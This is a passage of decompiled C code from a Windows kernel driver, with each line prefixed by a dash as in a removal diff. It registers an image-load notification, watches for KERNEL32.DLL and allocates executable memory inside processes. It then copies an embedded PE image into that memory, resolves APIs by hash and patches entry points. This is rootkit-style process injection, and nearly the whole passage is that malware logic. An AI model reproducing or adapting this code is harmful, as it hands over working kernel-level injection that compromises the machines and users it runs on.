- sub_107A2(v1, (int)nullsub_2);
- }
- byte_14617 = 0;
- *(_DWORD *)a1 = &Table;
- return a1;
- }
- // 124FC: using guessed type int nullsub_2();
- // 14617: using guessed type char byte_14617;
- // 1468C: using guessed type int dword_1468C;
- //----- (00010B68) --------------------------------------------------------
- int __thiscall sub_10B68(int this)
- {
- int result; // eax@3
- int v2; // [sp+0h] [bp-4h]@1
- v2 = this;
- if ( *(_DWORD *)(*(_DWORD *)(this + 96) + 12) == 2242560 )
- {
- result = sub_11CCC(this);
- }
- else
- {
- if ( *(_DWORD *)(*(_DWORD *)(this + 96) + 12) == 2242564 )
- {
- sub_10AE2((int)&v2);
- result = sub_10C22(v2);
- }
- else
- {
- result = -1073741822;
- }
- }
- return result;
- }
- //----- (00010BE8) --------------------------------------------------------
- signed int __cdecl sub_10BE8()
- {
- return 1;
- }
- //----- (00010BEC) --------------------------------------------------------
- int __userpurge sub_10BEC<eax>(int a1<ebp>, int a2, int a3)
- {
- int v3; // edi@1
- int v4; // esi@1
- *(_DWORD *)(a1 - 4) = -1;
- v4 = *(_DWORD *)(a1 + 12);
- v3 = *(_DWORD *)(a1 - 28);
- if ( v3 != 259 )
- {
- if ( v3 )
- *(_DWORD *)(v4 + 28) = 0;
- *(_DWORD *)(v4 + 24) = v3;
- IofCompleteRequest((PIRP)v4, 0);
- }
- return _SEH_epilog();
- }
- // 12463: using guessed type int _SEH_epilog(void);
- //----- (00010C22) --------------------------------------------------------
- signed int __usercall sub_10C22<eax>(int a1<eax>)
- {
- int v1; // edi@1
- int v2; // eax@3
- unsigned int v3; // esi@3
- int v4; // ecx@3
- signed int v6; // esi@6
- int v7; // edi@9
- struct _KMUTANT *v8; // [sp+10h] [bp-20h]@1
- ULONG v9; // [sp+14h] [bp-1Ch]@1
- LSA_UNICODE_STRING ValueName; // [sp+18h] [bp-18h]@1
- LSA_UNICODE_STRING DestinationString; // [sp+20h] [bp-10h]@1
- char v12; // [sp+28h] [bp-8h]@2
- v1 = a1;
- RtlInitUnicodeString(&DestinationString, &word_14395);
- RtlInitUnicodeString(&ValueName, &word_1445D);
- v8 = (struct _KMUTANT *)(v1 + 8);
- KeWaitForSingleObject((PVOID)(v1 + 8), 0, 0, 0, 0);
- v9 = sub_11D62(&DestinationString, &ValueName, v1);
- if ( v9 )
- {
- RtlInitUnicodeString((PUNICODE_STRING)&v12, &word_14471);
- v9 = sub_10638((LSA_UNICODE_STRING *)&v12, dword_14539, v1);
- if ( v9 )
- {
- LABEL_6:
- v6 = -1073741823;
- goto LABEL_7;
- }
- }
- v2 = *(_DWORD *)(v1 + 4);
- v3 = *(_DWORD *)(v2 + 4);
- sub_11EC6(dword_1453D, *(_DWORD *)v2, v3);
- if ( sub_11D46(v4, v3) )
- {
- KeReleaseMutex(v8, 0);
- return -1073741823;
- }
- v6 = v9;
- if ( !v9 )
- {
- v7 = *(_DWORD *)(v1 + 4);
- if ( v7 && *(_DWORD *)(v7 + 4) > 0u )
- {
- v6 = 0;
- goto LABEL_7;
- }
- goto LABEL_6;
- }
- LABEL_7:
- KeReleaseMutex(v8, 0);
- return v6;
- }
- // 14539: using guessed type int dword_14539;
- // 1453D: using guessed type int dword_1453D;
- //----- (00010CFE) --------------------------------------------------------
- signed int __stdcall sub_10CFE(int a1, int a2)
- {
- int v2; // eax@1
- int v3; // edi@1
- int v4; // esi@1
- int v5; // eax@2
- signed int v6; // edi@5
- int v8; // [sp+10h] [bp-4h]@1
- v3 = a1;
- v4 = 0;
- v8 = 0;
- KeWaitForSingleObject((PVOID)(a1 + 8), 0, 0, 0, 0);
- v2 = (int)ExAllocatePool(0, 0x10u);
- if ( v2 )
- {
- v5 = sub_105A0((int)&v8, *(_DWORD *)(*(_DWORD *)(a1 + 4) + 4), v2, **(const void ***)(a1 + 4));
- v3 = a1;
- v4 = 0;
- }
- else
- {
- v5 = 0;
- }
- sub_1076E(a2, (PVOID *)v5);
- if ( v8 == v4 )
- {
- if ( *(_DWORD *)(v3 + 4) == v4 )
- v6 = -1073741823;
- else
- v6 = 0;
- }
- else
- {
- v6 = v8;
- }
- KeReleaseMutex((PRKMUTEX)(a1 + 8), v4);
- return v6;
- }
- //----- (00010D7E) --------------------------------------------------------
- void __usercall sub_10D7E(int a1<eax>)
- {
- PVOID *v1; // edi@2
- if ( *(_BYTE *)a1 )
- {
- v1 = *(PVOID **)(a1 + 4);
- *(_BYTE *)a1 = 0;
- if ( v1 )
- {
- if ( *v1 )
- ExFreePoolWithTag(*v1, 0);
- ExFreePoolWithTag(v1, 0);
- }
- }
- }
- //----- (00010DA8) --------------------------------------------------------
- int __usercall sub_10DA8<eax>(int a1<ecx>, int a2<edi>, int a3<esi>)
- {
- int v4; // eax@1
- int v5; // [sp+0h] [bp-4h]@1
- v5 = a1;
- sub_10FC4(a3, (int)&v5);
- *(_DWORD *)a2 = *(_DWORD *)(a3 + 8) + *(_DWORD *)a3;
- v4 = v5;
- *(_DWORD *)(a2 + 4) = v5;
- *(_DWORD *)(a3 + 8) += v4;
- return a3;
- }
- //----- (00010DCC) --------------------------------------------------------
- void __stdcall sub_10DCC(int a1, HANDLE Handle, int a3)
- {
- int v3; // ecx@9
- int v4; // esi@9
- int v5; // ebx@12
- int v6; // ecx@12
- int v7; // eax@14
- int i; // [sp+10h] [bp-50h]@4
- unsigned int v9; // [sp+14h] [bp-4Ch]@9
- RTL_GENERIC_TABLE *v10; // [sp+18h] [bp-48h]@8
- int v11; // [sp+1Ch] [bp-44h]@8
- int v12; // [sp+20h] [bp-40h]@9
- char v13; // [sp+24h] [bp-3Ch]@8
- int v14; // [sp+28h] [bp-38h]@8
- int v15; // [sp+2Ch] [bp-34h]@9
- int v16; // [sp+30h] [bp-30h]@9
- int v17; // [sp+34h] [bp-2Ch]@11
- int v18; // [sp+38h] [bp-28h]@11
- int v19; // [sp+3Ch] [bp-24h]@4
- char v20; // [sp+40h] [bp-20h]@7
- WCHAR *v21; // [sp+44h] [bp-1Ch]@11
- char v22; // [sp+4Ch] [bp-14h]@14
- int v23; // [sp+54h] [bp-Ch]@9
- unsigned int v24; // [sp+58h] [bp-8h]@9
- int v25; // [sp+5Ch] [bp-4h]@9
- if ( sub_117A8(L"KERNEL32.DLL", a1) )
- {
- sub_1174A((int)Handle, a3);
- }
- else
- {
- if ( !sub_10542() )
- {
- i = 0;
- sub_11F42((int)&v19, (int)&i, Handle);
- if ( !i )
- {
- if ( v19 == *(_DWORD *)(a3 + 4) )
- {
- if ( !(dword_14391 & 4) || !v20 )
- {
- sub_10B36((int)&v10);
- sub_11066((int)Handle, v10);
- v13 = 1;
- v14 = 0;
- sub_10AE2((int)&v11);
- if ( !sub_10CFE(v11, (int)&v13) )
- {
- v3 = *(_DWORD *)v14;
- v24 = *(_DWORD *)(v14 + 4);
- v23 = v3;
- v25 = 0;
- v15 = 0;
- v16 = 0;
- sub_10FC4((int)&v23, (int)&v12);
- sub_10DA8(v3, (int)&v15, (int)&v23);
- sub_10FC4((int)&v23, (int)&v9);
- v4 = v25;
- if ( v25 <= v24 )
- {
- if ( !v12 )
- {
- v21 = 0;
- v17 = 0;
- v18 = 0;
- for ( i = 0; i < v9; ++i )
- {
- v5 = v4 + v23;
- v25 = v4 + 16;
- v12 = v4 + v23;
- sub_10DA8(v3, (int)&v21, (int)&v23);
- sub_10DA8(v6, (int)&v17, (int)&v23);
- v4 = v25;
- if ( v25 > v24 )
- break;
- if ( sub_117A8(v21, a1) )
- {
- v7 = sub_111B4((int)&v15, (int)&v22, *(_DWORD *)(v5 + 12));
- sub_11522((int)Handle, a3, v12, (int)&v17, v7);
- }
- }
- }
- }
- }
- sub_10D7E((int)&v13);
- }
- }
- }
- }
- }
- }
- // 124E0: using guessed type wchar_t aKernel32_dll[13];
- // 14391: using guessed type int dword_14391;
- //----- (00010F80) --------------------------------------------------------
- void __stdcall NotifyRoutine(int a1, HANDLE Handle, int a3)
- {
- if ( KeGetCurrentIrql() <= 1u )
- {
- if ( Handle )
- sub_10DCC(a1, Handle, a3);
- }
- }
- //----- (00010FC4) --------------------------------------------------------
- int __userpurge sub_10FC4<eax>(int result<eax>, int a2)
- {
- int v2; // ecx@1
- v2 = *(_DWORD *)(result + 8);
- if ( (unsigned int)(v2 + 4) <= *(_DWORD *)(result + 4) )
- *(_DWORD *)a2 = *(_DWORD *)(v2 + *(_DWORD *)result);
- *(_DWORD *)(result + 8) = v2 + 4;
- return result;
- }
- //----- (00010FE6) --------------------------------------------------------
- RTL_GENERIC_TABLE *__cdecl sub_10FE6()
- {
- memset(&Table, 0, sizeof(Table));
- byte_14658 = -1;
- dword_14654 = 0;
- dword_1465C = 0;
- dword_14660 = 0;
- RtlInitializeGenericTable(
- &Table,
- (PRTL_GENERIC_COMPARE_ROUTINE)CompareRoutine,
- (PRTL_GENERIC_ALLOCATE_ROUTINE)AllocateRoutine,
- (PRTL_GENERIC_FREE_ROUTINE)FreeRoutine,
- 0);
- return &Table;
- }
- // 14654: using guessed type int dword_14654;
- // 14658: using guessed type char byte_14658;
- // 1465C: using guessed type int dword_1465C;
- // 14660: using guessed type int dword_14660;
- //----- (00011028) --------------------------------------------------------
- PVOID __usercall sub_11028<eax>(int a1<eax>, RTL_GENERIC_TABLE *a2<edi>)
- {
- PKSPIN_LOCK v2; // ecx@1
- PVOID v3; // esi@1
- PVOID v4; // eax@1
- char v5; // zf@1
- KIRQL v6; // dl@2
- int Buffer; // [sp+8h] [bp-18h]@1
- PKSPIN_LOCK SpinLock; // [sp+1Ch] [bp-4h]@1
- Buffer = a1;
- sub_1118A((int)&SpinLock, (int)&a2[1]);
- v4 = RtlLookupElementGenericTable(a2, &Buffer);
- v2 = SpinLock;
- v5 = SpinLock[3] == 1;
- --v2[3];
- v3 = v4;
- if ( v5 )
- {
- v6 = *((_BYTE *)v2 + 4);
- v2[2] = 0;
- KfReleaseSpinLock(v2, v6);
- }
- return v3;
- }
- //----- (00011066) --------------------------------------------------------
- signed int __usercall sub_11066<eax>(int a1<eax>, RTL_GENERIC_TABLE *a2<edi>)
- {
- int v2; // ecx@1
- BOOLEAN v3; // al@1
- char v4; // zf@2
- KIRQL v5; // dl@3
- signed int result; // eax@4
- char v7; // zf@5
- KIRQL v8; // dl@6
- int Buffer; // [sp+8h] [bp-18h]@1
- int v10; // [sp+1Ch] [bp-4h]@1
- Buffer = a1;
- sub_1118A((int)&v10, (int)&a2[1]);
- v3 = RtlDeleteElementGenericTable(a2, &Buffer);
- v2 = v10;
- if ( v3 )
- {
- v7 = *(_DWORD *)(v10 + 12)-- == 1;
- if ( v7 )
- {
- v8 = *(_BYTE *)(v2 + 4);
- *(_DWORD *)(v2 + 8) = 0;
- KfReleaseSpinLock((PKSPIN_LOCK)v2, v8);
- }
- result = 0;
- }
- else
- {
- v4 = *(_DWORD *)(v10 + 12)-- == 1;
- if ( v4 )
- {
- v5 = *(_BYTE *)(v2 + 4);
- *(_DWORD *)(v2 + 8) = 0;
- KfReleaseSpinLock((PKSPIN_LOCK)v2, v5);
- }
- result = -1073741823;
- }
- return result;
- }
- //----- (000110C0) --------------------------------------------------------
- signed int __userpurge sub_110C0<eax>(RTL_GENERIC_TABLE *a1<eax>, int *a2)
- {
- RTL_GENERIC_TABLE *v2; // edi@1
- PKSPIN_LOCK v3; // ecx@3
- char v4; // zf@3
- PVOID v6; // eax@7
- char v7; // zf@8
- char v8; // zf@10
- KIRQL v9; // dl@11
- PKSPIN_LOCK SpinLock; // [sp+Ch] [bp-4h]@1
- v2 = a1;
- sub_1118A((int)&SpinLock, (int)&a1[1]);
- if ( sub_11028(*a2, v2) && sub_11066(*a2, v2) )
- {
- v3 = SpinLock;
- v4 = SpinLock[3] == 1;
- --v3[3];
- if ( !v4 )
- return -1073741823;
- v3[2] = 0;
- LABEL_5:
- KfReleaseSpinLock(v3, *((_BYTE *)v3 + 4));
- return -1073741823;
- }
- v6 = RtlInsertElementGenericTable(v2, a2, 0x14u, 0);
- v3 = SpinLock;
- if ( !v6 )
- {
- v7 = SpinLock[3]-- == 1;
- if ( !v7 )
- return -1073741823;
- v3[2] = 0;
- goto LABEL_5;
- }
- v8 = SpinLock[3]-- == 1;
- if ( v8 )
- {
- v9 = *((_BYTE *)v3 + 4);
- v3[2] = 0;
- KfReleaseSpinLock(v3, v9);
- }
- return 0;
- }
- //----- (00011142) --------------------------------------------------------
- bool __stdcall CompareRoutine(int a1, int a2, int a3)
- {
- bool result; // eax@2
- if ( *(_DWORD *)a2 == *(_DWORD *)a3 )
- result = 2;
- else
- result = *(_DWORD *)a2 >= *(_DWORD *)a3;
- return result;
- }
- //----- (00011160) --------------------------------------------------------
- PVOID __stdcall AllocateRoutine(int a1, SIZE_T NumberOfBytes)
- {
- return ExAllocatePool(0, NumberOfBytes);
- }
- //----- (00011172) --------------------------------------------------------
- void __stdcall FreeRoutine(int a1, PVOID P)
- {
- if ( P )
- ExFreePoolWithTag(P, 0);
- }
- //----- (0001118A) --------------------------------------------------------
- int __usercall sub_1118A<eax>(int a1<ebx>, int a2<esi>)
- {
- PKTHREAD v2; // edi@1
- KIRQL v3; // al@2
- *(_DWORD *)a1 = a2;
- v2 = KeGetCurrentThread();
- if ( v2 != *(PKTHREAD *)(a2 + 8) )
- {
- v3 = KfAcquireSpinLock((PKSPIN_LOCK)a2);
- *(_DWORD *)(a2 + 12) = 0;
- *(_BYTE *)(a2 + 4) = v3;
- *(_DWORD *)(a2 + 8) = v2;
- }
- ++*(_DWORD *)(a2 + 12);
- return a1;
- }
- //----- (000111B4) --------------------------------------------------------
- int __userpurge sub_111B4<eax>(int a1<eax>, int a2<ebx>, int a3)
- {
- int v3; // esi@1
- int v4; // ecx@2
- int v5; // ecx@4
- int v7; // [sp+8h] [bp-24h]@2
- unsigned int v8; // [sp+Ch] [bp-20h]@2
- unsigned int v9; // [sp+10h] [bp-1Ch]@2
- int v10; // [sp+14h] [bp-18h]@2
- int v11; // [sp+18h] [bp-14h]@2
- int v12; // [sp+1Ch] [bp-10h]@4
- unsigned int v13; // [sp+20h] [bp-Ch]@2
- unsigned int v14; // [sp+24h] [bp-8h]@3
- v3 = 0;
- if ( a3
- && (v4 = *(_DWORD *)a1,
- v8 = *(_DWORD *)(a1 + 4),
- v7 = v4,
- v9 = 0,
- v10 = 0,
- v11 = 0,
- sub_10FC4((int)&v7, (int)&v13),
- v9 <= v8)
- && (v14 = 0, v13 > 0) )
- {
- while ( 1 )
- {
- sub_10FC4((int)&v7, (int)&v12);
- sub_10DA8(v5, (int)&v10, (int)&v7);
- if ( v9 > v8 )
- {
- LABEL_7:
- v3 = 0;
- goto LABEL_8;
- }
- if ( a3 == v12 )
- break;
- ++v14;
- if ( v14 >= v13 )
- goto LABEL_7;
- }
- *(_DWORD *)a2 = v10;
- *(_DWORD *)(a2 + 4) = v11;
- }
- else
- {
- LABEL_8:
- *(_DWORD *)a2 = v3;
- *(_DWORD *)(a2 + 4) = v3;
- }
- return a2;
- }
- //----- (00011242) --------------------------------------------------------
- signed int __userpurge sub_11242<eax>(int a1<eax>, int a2, int a3)
- {
- signed int result; // eax@1
- PVOID v4; // eax@2
- PVOID v5; // edi@2
- int v6; // eax@4
- int v7; // ebx@4
- unsigned int v8; // esi@4
- void *v9; // ST08_4@4
- int v10; // ecx@10
- char v11; // [sp+10h] [bp-38h]@1
- int v12; // [sp+18h] [bp-30h]@4
- int v13; // [sp+1Ch] [bp-2Ch]@4
- int v14; // [sp+30h] [bp-18h]@8
- int v15; // [sp+34h] [bp-14h]@7
- unsigned int v16; // [sp+38h] [bp-10h]@8
- int v17; // [sp+3Ch] [bp-Ch]@8
- unsigned int v18; // [sp+40h] [bp-8h]@4
- int v19; // [sp+44h] [bp-4h]@6
- result = sub_121E1((int)&v11, *(_DWORD *)(a1 + 4), 1);
- if ( !result )
- {
- v4 = sub_1182C(dword_12680 + 4981);
- v5 = v4;
- if ( v4
- && (v7 = (int)((char *)v4 + 4981),
- memcpy(v4, &unk_12EB8, 0x1375u),
- memcpy((char *)v5 + 4981, &unk_12694, dword_12680),
- *(_WORD *)v7 = 23117,
- *(_DWORD *)(dword_1268C + v7) = 17744,
- *(_WORD *)(dword_12690 + v7) = 267,
- v9 = (void *)(v7 + dword_12688),
- *(_DWORD *)(a3 + 4) = v7 + dword_12688,
- memset(v9, 0, 0x98u),
- *(_DWORD *)(*(_DWORD *)(a3 + 4) + 88) = v5,
- *(_DWORD *)(*(_DWORD *)(a3 + 4) + 96) = v7,
- *(_DWORD *)(*(_DWORD *)(a3 + 4) + 104) = dword_12680,
- v18 = v12 + *(_DWORD *)(v13 + 40),
- v8 = v18,
- (v6 = sub_1210F((int)&v11, v18)) != 0)
- && v12 + *(_DWORD *)(v6 + 8) + *(_DWORD *)(v6 + 12) >= v8 + 12 )
- {
- result = sub_118E2(v8, (int)&v11);
- v19 = result;
- if ( !result )
- {
- sub_10A8A((int)&v15, &v19);
- result = v19;
- if ( !v19 )
- {
- v16 = v18;
- v17 = 12;
- result = (*(int (__stdcall **)(signed int, unsigned int *, int *, signed int, int *))v15)(
- -1,
- &v16,
- &v17,
- 128,
- &v14);
- if ( !result )
- {
- result = sub_11864((HANDLE *)(*(_DWORD *)(a3 + 4) + 144));
- if ( !result )
- {
- v10 = v14;
- *(_DWORD *)a3 = a2;
- *(_DWORD *)(a3 + 8) = v7 + dword_12684;
- *(_DWORD *)(a3 + 12) = v18;
- *(_DWORD *)(*(_DWORD *)(a3 + 4) + 136) = v10;
- result = 0;
- }
- }
- }
- }
- }
- else
- {
- result = -1073741823;
- }
- }
- return result;
- }
- // 12684: using guessed type int dword_12684;
- // 12688: using guessed type int dword_12688;
- // 1268C: using guessed type int dword_1268C;
- // 12690: using guessed type int dword_12690;
- //----- (000113C2) --------------------------------------------------------
- PVOID __userpurge sub_113C2<eax>(int a1<edi>, int a2, int a3)
- {
- PVOID result; // eax@1
- PVOID v4; // esi@1
- int v5; // ebx@2
- result = sub_1182C(*(_DWORD *)(a1 + 4) + 40);
- v4 = result;
- if ( result )
- {
- v5 = (int)((char *)result + 40);
- memcpy((char *)result + 40, *(const void **)a1, *(_DWORD *)(a1 + 4));
- *((_DWORD *)v4 + 2) = v5;
- *((_DWORD *)v4 + 4) = *(_DWORD *)(a1 + 4);
- *((_WORD *)v4 + 12) = *(_WORD *)(a2 + 4);
- *((_BYTE *)v4 + 32) = (*(_BYTE *)(a2 + 6) >> 1) & 1;
- *(_DWORD *)v4 = *(_DWORD *)(*(_DWORD *)(a3 + 4) + 112);
- result = *(PVOID *)(a3 + 4);
- *((_DWORD *)result + 28) = v4;
- }
- return result;
- }
- //----- (0001141E) --------------------------------------------------------
- void __userpurge sub_1141E(int a1<eax>, int a2<ecx>, int a3<ebx>, int a4, int a5)
- {
- int v5; // esi@1
- char v6; // zf@1
- int v7; // edi@2
- int v8; // edi@4
- int v9; // eax@6
- int v10; // eax@10
- RTL_GENERIC_TABLE *v11; // edi@10
- char v12; // [sp+8h] [bp-30h]@11
- LSA_UNICODE_STRING DestinationString; // [sp+1Ch] [bp-1Ch]@3
- PCWSTR v14; // [sp+24h] [bp-14h]@2
- int v15; // [sp+28h] [bp-10h]@9
- char v16; // [sp+2Ch] [bp-Ch]@1
- int v17; // [sp+30h] [bp-8h]@1
- RTL_GENERIC_TABLE *v18; // [sp+34h] [bp-4h]@10
- v17 = 0;
- v6 = (*(_BYTE *)(a3 + 6) & 2) == 0;
- v5 = a2;
- v16 = 1;
- if ( v6 )
- {
- v7 = *(_DWORD *)(a1 + 4);
- v14 = *(PCWSTR *)a1;
- }
- else
- {
- RtlInitUnicodeString(&DestinationString, *(PCWSTR *)a1);
- if ( sub_10638(&DestinationString, dword_14539, (int)&v16) )
- {
- v9 = *(_DWORD *)v5;
- v7 = *(_DWORD *)(v5 + 4);
- }
- else
- {
- v8 = v17;
- if ( *(_BYTE *)(a3 + 6) & 1 )
- sub_11EC6(*(_DWORD *)(a3 + 8), *(_DWORD *)v17, *(_DWORD *)(v17 + 4));
- v9 = *(_DWORD *)v8;
- v7 = *(_DWORD *)(v8 + 4);
- }
- v14 = (PCWSTR)v9;
- }
- v15 = v7;
- if ( v7 )
- {
- sub_10B36((int)&v18);
- v11 = v18;
- v10 = (int)sub_11028(a4, v18);
- if ( v10 || !sub_11242(a5, a4, (int)&v12) && !sub_110C0(v11, (int *)&v12) && (v10 = (int)sub_11028(a4, v11)) != 0 )
- sub_113C2((int)&v14, a3, v10);
- }
- sub_10D7E((int)&v16);
- }
- // 14539: using guessed type int dword_14539;
- //----- (000114EC) --------------------------------------------------------
- void __fastcall sub_114EC(int a1, int a2, int a3, int a4, int a5)
- {
- sub_1141E(a5, a1, a2, a3, a4);
- }
- //----- (00011522) --------------------------------------------------------
- LONG_PTR __stdcall sub_11522(int a1, int a2, int a3, int a4, int a5)
- {
- void *v5; // ecx@1
- char v7; // [sp+Ch] [bp-28h]@1
- char v8; // [sp+10h] [bp-24h]@5
- char v9; // [sp+18h] [bp-1Ch]@4
- int v10; // [sp+30h] [bp-4h]@1
- v10 = 0;
- sub_11FC0((int)&v7, (int)&v10, a1);
- if ( !v10 )
- sub_114EC(a5, a3, a1, a2, a4);
- if ( v7 )
- {
- v7 = 0;
- KeUnstackDetachProcess(&v9);
- }
- return sub_120CC(v5, (LONG_PTR)&v8);
- }
- // 12600: using guessed type int __stdcall KeUnstackDetachProcess(_DWORD);
- //----- (00011578) --------------------------------------------------------
- PVOID __stdcall sub_11578(int a1)
- {
- RTL_GENERIC_TABLE *v2; // [sp+8h] [bp-4h]@1
- sub_10B36((int)&v2);
- return sub_11028(a1, v2);
- }
- //----- (00011598) --------------------------------------------------------
- PVOID __stdcall sub_11598(int a1)
- {
- return sub_11578(a1);
- }
- //----- (000115CC) --------------------------------------------------------
- signed int __userpurge sub_115CC<eax>(const void *a1<eax>, int a2<ebx>, int a3)
- {
- signed int result; // eax@1
- int v4; // ST38_4@1
- int v5; // esi@2
- char v6; // zf@2
- int v7; // edi@12
- int v8; // ecx@12
- int v9; // esi@12
- char v10; // [sp+8h] [bp-38h]@1
- char v11; // [sp+28h] [bp-18h]@1
- int v12; // [sp+2Ch] [bp-14h]@2
- int v13; // [sp+30h] [bp-10h]@12
- int v14; // [sp+34h] [bp-Ch]@12
- RTL_GENERIC_TABLE *v15; // [sp+3Ch] [bp-4h]@2
- v4 = *(_DWORD *)(a2 + 4);
- memcpy(&v11, a1, 0x14u);
- result = sub_121E1((int)&v10, v4, 1);
- if ( !result )
- {
- sub_10B36((int)&v15);
- sub_11066(a3, v15);
- v5 = v12;
- *(_DWORD *)v12 = *(_DWORD *)(a2 + 4);
- *(_DWORD *)(v5 + 8) = sub_1236B((int)&v10, -934890519);
- *(_DWORD *)(v5 + 16) = sub_1236B((int)&v10, -1871298611);
- *(_DWORD *)(v5 + 24) = sub_1236B((int)&v10, -1680372695);
- *(_DWORD *)(v5 + 32) = sub_1236B((int)&v10, 578844873);
- *(_DWORD *)(v5 + 40) = sub_1236B((int)&v10, 1538632765);
- *(_DWORD *)(v5 + 48) = sub_1236B((int)&v10, 1538689877);
- *(_DWORD *)(v5 + 56) = sub_1236B((int)&v10, -964130467);
- *(_DWORD *)(v5 + 64) = sub_1236B((int)&v10, -411935863);
- *(_DWORD *)(v5 + 72) = sub_1236B((int)&v10, 122157493);
- result = sub_1236B((int)&v10, 201870840);
- v6 = *(_DWORD *)(v5 + 8) == 0;
- *(_DWORD *)(v5 + 80) = result;
- if ( !v6 )
- {
- if ( *(_DWORD *)(v5 + 16) )
- {
- if ( *(_DWORD *)(v5 + 24) )
- {
- if ( *(_DWORD *)(v5 + 32) )
- {
- if ( *(_DWORD *)(v5 + 40) )
- {
- if ( *(_DWORD *)(v5 + 48) )
- {
- if ( *(_DWORD *)(v5 + 56) )
- {
- if ( *(_DWORD *)(v5 + 64) )
- {
- if ( *(_DWORD *)(v5 + 72) )
- {
- if ( result )
- {
- result = v14;
- v7 = v5 + 120;
- v8 = v13;
- v9 = v14;
- *(_DWORD *)v7 = *(_DWORD *)v14;
- v9 += 4;
- v7 += 4;
- *(_DWORD *)v7 = *(_DWORD *)v9;
- *(_DWORD *)(v7 + 4) = *(_DWORD *)(v9 + 4);
- *(_DWORD *)result = *(_DWORD *)"ž";
- *(_WORD *)(result + 4) = *(_WORD *)&asc_12678[4];
- *(_BYTE *)(result + 6) = asc_12678[6];
- *(_DWORD *)(result + 1) = v8;
- }
- }
- }
- }
- }
- }
- }
- }
- }
- }
- }
- return result;
- }
- //----- (00011718) --------------------------------------------------------
- signed int __thiscall sub_11718(int this, int a2, const void *a3)
- {
- return sub_115CC(a3, this, a2);
- }
- //----- (0001174A) --------------------------------------------------------
- __int32 __stdcall sub_1174A(int a1, int a2)
- {
- __int32 result; // eax@1
- const void *v3; // edi@1
- void *v4; // ecx@2
- char v5; // [sp+8h] [bp-28h]@2
- char v6; // [sp+Ch] [bp-24h]@6
- char v7; // [sp+14h] [bp-1Ch]@5
- int v8; // [sp+2Ch] [bp-4h]@2
- result = (__int32)sub_11598(a1);
- v3 = (const void *)result;
- if ( result )
- {
- v8 = 0;
- sub_11FC0((int)&v5, (int)&v8, a1);
- if ( !v8 )
- sub_11718(a2, a1, v3);
- if ( v5 )
- {
- v5 = 0;
- KeUnstackDetachProcess(&v7);
- }
- result = sub_120CC(v4, (LONG_PTR)&v6);
- }
- return result;
- }
- // 12600: using guessed type int __stdcall KeUnstackDetachProcess(_DWORD);
- //----- (000117A8) --------------------------------------------------------
- char __usercall sub_117A8<al>(WCHAR *a1<eax>, int a2<ecx>)
- {
- WCHAR *v2; // edi@1
- int v3; // esi@1
- WCHAR v4; // dx@2
- unsigned int v5; // eax@3
- int v6; // edx@3
- char result; // al@4
- int v8; // eax@5
- WCHAR *v9; // esi@6
- WCHAR v10; // bx@7
- int v11; // [sp+8h] [bp-Ch]@3
- unsigned int v12; // [sp+Ch] [bp-8h]@5
- int v13; // [sp+10h] [bp-4h]@6
- v2 = a1;
- v3 = (int)(a1 + 1);
- do
- {
- v4 = *a1;
- ++a1;
- }
- while ( v4 );
- v6 = (signed int)((char *)a1 - v3) >> 1;
- v5 = (unsigned __int16)(*(_WORD *)a2 >> 1);
- v11 = v6;
- if ( v6 <= v5 )
- {
- v12 = 0;
- v8 = *(_DWORD *)(a2 + 4) + 2 * (v5 - v6);
- if ( v6 )
- {
- v13 = v8 - (_DWORD)v2;
- v9 = v2;
- while ( 1 )
- {
- v10 = RtlUpcaseUnicodeChar(*(WCHAR *)((char *)v9 + v13));
- if ( RtlUpcaseUnicodeChar(*v9) != v10 )
- break;
- ++v12;
- ++v9;
- if ( v12 >= v11 )
- goto LABEL_9;
- }
- result = 0;
- }
- else
- {
- LABEL_9:
- result = 1;
- }
- }
- else
- {
- result = 0;
- }
- return result;
- }
- //----- (0001182C) --------------------------------------------------------
- PVOID __usercall sub_1182C<eax>(ULONG a1<esi>)
- {
- PVOID result; // eax@3
- PVOID BaseAddress; // [sp+0h] [bp-8h]@1
- ULONG AllocationSize; // [sp+4h] [bp-4h]@1
- BaseAddress = 0;
- AllocationSize = a1;
- if ( ZwAllocateVirtualMemory((HANDLE)0xFFFFFFFF, &BaseAddress, 0, &AllocationSize, 0x1000u, 0x40u)
- || AllocationSize < a1 )
- result = 0;
- else
- result = BaseAddress;
- return result;
- }
- //----- (00011864) --------------------------------------------------------
- int __usercall sub_11864<eax>(HANDLE *a1<edi>)
- {
- signed int v1; // esi@1
- int i; // esi@6
- HANDLE Handle; // [sp+4h] [bp-4Ch]@3
- OBJECT_ATTRIBUTES ObjectAttributes; // [sp+24h] [bp-2Ch]@1
- struct _IO_STATUS_BLOCK IoStatusBlock; // [sp+3Ch] [bp-14h]@2
- LSA_UNICODE_STRING DestinationString; // [sp+44h] [bp-Ch]@1
- NTSTATUS v8; // [sp+4Ch] [bp-4h]@2
- RtlInitUnicodeString(&DestinationString, &SourceString);
- ObjectAttributes.RootDirectory = 0;
- ObjectAttributes.SecurityDescriptor = 0;
- ObjectAttributes.SecurityQualityOfService = 0;
- ObjectAttributes.Length = 24;
- ObjectAttributes.Attributes = 64;
- ObjectAttributes.ObjectName = &DestinationString;
- v1 = 0;
- while ( 1 )
- {
- v8 = ZwOpenFile(a1, 0xC0100000u, &ObjectAttributes, &IoStatusBlock, 3u, 0x60u);
- if ( v8 )
- break;
- *(&Handle + v1++) = *a1;
- if ( v1 > 7 )
- goto LABEL_6;
- }
- ++v1;
- LABEL_6:
- for ( i = v1 - 2; i >= 0; --i )
- ZwClose(*(&Handle + i));
- return v8;
- }
- //----- (000118E2) --------------------------------------------------------
- signed int __stdcall sub_118E2(unsigned int a1, int a2)
- {
- signed int result; // eax@2
- bool v3; // eax@3
- int v4; // edx@6
- int v5; // ecx@6
- unsigned int v6; // eax@7
- unsigned int v7; // eax@9
- unsigned int v8; // edi@10
- int v9; // eax@11
- int i; // [sp+0h] [bp-10h]@6
- unsigned int v11; // [sp+4h] [bp-Ch]@10
- int v12; // [sp+8h] [bp-8h]@3
- int v13; // [sp+Ch] [bp-4h]@3
- if ( *(_DWORD *)(a2 + 8) == *(_DWORD *)(*(_DWORD *)(a2 + 12) + 52)
- || (v13 = 0, v12 = 0, v3 = sub_122D0(a2, 5u, (int)&v13, (int)&v12), v3 == 2) )
- {
- result = 0;
- }
- else
- {
- if ( v3 )
- {
- result = -1073741823;
- }
- else
- {
- v5 = v13;
- v4 = v13 + 8;
- for ( i = v13 + v12; v5 + 8 <= (unsigned int)i; v13 = v5 )
- {
- v6 = *(_DWORD *)(v5 + 4);
- if ( !v6 )
- break;
- if ( v6 < 8 || (v7 = v6 - 8, v7 & 1) )
- return -1073741823;
- v11 = v7 >> 1;
